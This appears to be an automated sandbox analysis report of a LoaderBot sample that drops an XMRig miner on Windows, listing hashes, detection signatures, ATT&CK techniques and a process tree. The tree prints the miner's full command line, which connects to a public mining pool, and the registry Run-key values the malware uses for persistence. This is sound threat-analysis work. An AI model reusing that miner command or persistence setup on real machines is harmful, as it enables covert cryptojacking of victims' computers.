loaderbot | 176402f749dfb2bf03b9dc1131b7340de63bf204490c6df9e7cb5dcfbf4270ee

Analysis

max time kernel
18s
max time network
41s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
18-05-2024 21:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe
Size

1.8MB
MD5

56c8c048e10d2922c2130aab4509e0aa
SHA1

8082a9a6050e497ed4613e352d440b186fd19796
SHA256

176402f749dfb2bf03b9dc1131b7340de63bf204490c6df9e7cb5dcfbf4270ee
SHA512

387f86e764065fcc455eed2c5c2a81b93befe53568147a2e3a56d6cbefad7bdd77c56dba7f04ba711a0eb7d52a267dd26ea99b660b0e2a1433a9c5bd3eb4385a
SSDEEP

49152:HkSQoVCh6f19ne81HbOQDP3D5rtAVBjovA0P9S7w:HkzoQ698YH60NpADjovA0Mc

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
LoaderBot executable 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Roaming\svchost.exe loaderbot
behavioral2/memory/1620-26-0x0000000000460000-0x00000000007F2000-memory.dmp loaderbot
XMRig Miner payload 2 IoCs
miner

Processes:

resource yara_rule

behavioral2/memory/3624-68-0x0000000140000000-0x00000001404AB000-memory.dmp xmrig
behavioral2/memory/3624-86-0x0000000140000000-0x00000001404AB000-memory.dmp xmrig

resource	yara_rule
C:\Users\Admin\AppData\Roaming\svchost.exe	loaderbot
behavioral2/memory/1620-26-0x0000000000460000-0x00000000007F2000-memory.dmp	loaderbot

resource	yara_rule
behavioral2/memory/3624-68-0x0000000140000000-0x00000001404AB000-memory.dmp	xmrig
behavioral2/memory/3624-86-0x0000000140000000-0x00000001404AB000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sdfadgfbfsga.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	sdfadgfbfsga.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	svchost.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner
Drops startup file 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url svchost.exe
Executes dropped EXE 4 IoCs

Processes:

sdfadgfbfsga.exesvshost.exesvchost.exeDriver.exe

pid process

1048 sdfadgfbfsga.exe
1572 svshost.exe
1620 svchost.exe
3624 Driver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	svchost.exe

pid	process
1048	sdfadgfbfsga.exe
1572	svshost.exe
1620	svchost.exe
3624	Driver.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exeExplorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Time Manager = "C:\\ProgramData\\TimeManager.exe"	Explorer.EXE

Drops file in Windows directory 2 IoCs

Processes:

svchost.exesvchost.exe

description ioc process

File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe
File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Explorer.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Explorer.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Explorer.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost.exe

pid process

4660 svchost.exe

pid	process
4660	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

svshost.exesvchost.exe

pid	process
1572	svshost.exe
1572	svshost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe
1620	svchost.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

svshost.exesvchost.exeDriver.exesvchost.exesvchost.exeExplorer.EXEsvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1572	svshost.exe
Token: SeDebugPrivilege	1620	svchost.exe
Token: SeLockMemoryPrivilege	3624	Driver.exe
Token: SeLockMemoryPrivilege	3624	Driver.exe
Token: SeAuditPrivilege	4524	svchost.exe
Token: SeAuditPrivilege	872	svchost.exe
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeAuditPrivilege	4364	svchost.exe
Token: SeAuditPrivilege	3060	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

3392 Explorer.EXE
3392 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

3392 Explorer.EXE
3392 Explorer.EXE

pid	process
3392	Explorer.EXE
3392	Explorer.EXE

pid	process
3392	Explorer.EXE
3392	Explorer.EXE

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exesdfadgfbfsga.exesvshost.exesvchost.exe

description	pid	process	target process
PID 2984 wrote to memory of 1048	2984	56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe	sdfadgfbfsga.exe
PID 2984 wrote to memory of 1048	2984	56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe	sdfadgfbfsga.exe
PID 2984 wrote to memory of 1048	2984	56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe	sdfadgfbfsga.exe
PID 1048 wrote to memory of 1572	1048	sdfadgfbfsga.exe	svshost.exe
PID 1048 wrote to memory of 1572	1048	sdfadgfbfsga.exe	svshost.exe
PID 1048 wrote to memory of 1572	1048	sdfadgfbfsga.exe	svshost.exe
PID 1048 wrote to memory of 1620	1048	sdfadgfbfsga.exe	svchost.exe
PID 1048 wrote to memory of 1620	1048	sdfadgfbfsga.exe	svchost.exe
PID 1048 wrote to memory of 1620	1048	sdfadgfbfsga.exe	svchost.exe
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1572 wrote to memory of 3392	1572	svshost.exe	Explorer.EXE
PID 1620 wrote to memory of 3624	1620	svchost.exe	Driver.exe
PID 1620 wrote to memory of 3624	1620	svchost.exe	Driver.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3392

C:\Users\Admin\AppData\Local\Temp\56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\56c8c048e10d2922c2130aab4509e0aa_JaffaCakes118.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2984

C:\Users\Admin\AppData\Roaming\sdfadgfbfsga.exe
"C:\Users\Admin\AppData\Roaming\sdfadgfbfsga.exe" -s -p6dv8vdadv6z8vzdvasfav
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Roaming\svshost.exe
"C:\Users\Admin\AppData\Roaming\svshost.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572

C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 4
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: AddClipboardFormatListener
PID:4660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:3120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:4676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:4396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:3952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1944

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\TimeManager.exe
Filesize
240KB

MD5
21c580fec61c0ae44a7b99cea7ea697d

SHA1
c0cdccf33c0d72dbd00dc84d74cdc9e7afd6bd54

SHA256
e9095540ae0b91af9908f5a80ccfbffc2dfa27de015a78e66a42fe11e7803668

SHA512
3fae960dbe784d22adaa126c70bbcbbde43d38bb406db6d666234dc007db9d2adb8fe6ba3c459362b62ad6f3a49e0948c4728198be15a1f3c55b2a5fdddec2a9

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.5MB

MD5
cf36d20a96903fb4d0e92eb4fe873ab8

SHA1
c789a22bd215bfc2a698fda1295f295745f34d35

SHA256
d38ee5052fa13de8b3db050fe84fb89e7946446e2cd5b826fbd31792e406aae2

SHA512
d117cecf9ef9d1f2aab1bd80f6947872c8cc8e18a36ce41f1cb25b1fac008e9c5fae7f0f0093f78835b3967582f7556fd626fd8c8c1fa32d41359ef0206e9535

Download Submit
C:\Users\Admin\AppData\Roaming\sdfadgfbfsga.exe
Filesize
1.9MB

MD5
eff8e6a7ebcbd89040e76016b05f39aa

SHA1
6bc64b0e081d171596c1a774ba56e7d3180de4e8

SHA256
68ccc794872d16dcda0be4cbe98483bab0f9d69c63c4094e278085fbd4b046e4

SHA512
0ee9c9b33f1d576a4b090a359fb5ea2613f437c5eaa309d99ab1551edce3aaa3361b6ccf580e7eb448af60ef3b5e0ece6cf0b2cc3efa46cee476264097a25dcc

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe
Filesize
3.6MB

MD5
2b393ba5e5ad8a75f4dad72877bacd70

SHA1
cb3fef3f8a761892567eb064f29a24625dfea6f5

SHA256
381f70e51d18dbb18ac3e280085f8c43bceed7d67a0f71c13b10ec622c648c3b

SHA512
8a93d77366c8a3c0d28b61c4440829ecae70fe845f4410eefcee1ef369071ec3789de2ac48f301c42bde31db79054a0d2928055490b7b9fc22ffd9a1d5268a6b

Download Submit
C:\Users\Admin\AppData\Roaming\svshost.exe
Filesize
240KB

MD5
e1d65b4deb9cf804673247f96da16754

SHA1
b529ee84ae305713de91a83aa822012b20cb00f1

SHA256
e4a936c2d6c3a168fdd3fa394007d237af82cdd7cefabc8c275e2b9d4b59e640

SHA512
2c04ab097df684c5b2b7c6228a383eb80434fa3979de556f6448aa603d22ca61815c8246302309416480016c2b591568654d578dd7941cef455bd1436df9ff40

Download Submit
C:\Windows\Tasks\SA.DAT
Filesize
6B

MD5
f1a6cd5adaab953a6764ea364e17bfb8

SHA1
c99a1eb2d8974a667d2e0bc2dc1efcbe0ef23387

SHA256
12dc5ccd7fecafe070976a1916e9672e3d53085633c86957aee305ccc584184c

SHA512
da8cc20e0c0f48a975f97fc133ba4e99de6771163465d03f1cc0e3019fedfe0afa99799b9e343610a941218b19c9117b12e4ab86911d04c2908b6db44523e84c

Download Submit
memory/1572-25-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1572-30-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/1572-19-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1620-26-0x0000000000460000-0x00000000007F2000-memory.dmp

Filesize
3.6MB

Download
memory/1620-43-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/2828-56-0x000001E528B30000-0x000001E528B40000-memory.dmp

Filesize
64KB

Download
memory/2828-62-0x000001E528B90000-0x000001E528BA0000-memory.dmp

Filesize
64KB

Download
memory/3392-40-0x0000000002BA0000-0x0000000002BBA000-memory.dmp

Filesize
104KB

Download
memory/3392-38-0x0000000002BA0000-0x0000000002BBA000-memory.dmp

Filesize
104KB

Download
memory/3392-39-0x0000000002BA0000-0x0000000002BBA000-memory.dmp

Filesize
104KB

Download
memory/3392-32-0x0000000002BA0000-0x0000000002BBA000-memory.dmp

Filesize
104KB

Download
memory/3392-28-0x0000000002BA0000-0x0000000002BBA000-memory.dmp

Filesize
104KB

Download
memory/3624-53-0x0000000140000000-0x00000001404AB000-memory.dmp

Filesize
4.7MB

Download
memory/3624-55-0x0000000000520000-0x0000000000530000-memory.dmp

Filesize
64KB

Download
memory/3624-68-0x0000000140000000-0x00000001404AB000-memory.dmp

Filesize
4.7MB

Download
memory/3624-86-0x0000000140000000-0x00000001404AB000-memory.dmp

Filesize
4.7MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads